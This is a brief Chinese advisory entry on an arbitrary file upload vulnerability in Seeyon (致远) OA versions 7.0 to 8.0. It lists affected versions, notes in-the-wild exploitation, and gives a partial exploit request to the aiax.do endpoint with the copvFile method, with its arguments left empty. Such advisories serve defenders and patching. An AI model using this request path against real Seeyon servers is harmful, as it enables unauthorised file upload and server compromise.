致远OA任意文件上传漏洞
漏洞编号
无
影响产品
致远 OA V8.0
致远OA V7.1、V7.1SP1
致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
利用状态
在野利用(已公开poc)
漏洞详情
路径(需要普通用户权限)
POST /seeyon/aiax.do?method=aiaxAction&managerName=cipSynSchemeManager&requestCompress=gzip HTTP/1.1
Host: 1.1.1.1
managerMethod=copvFile&arguments=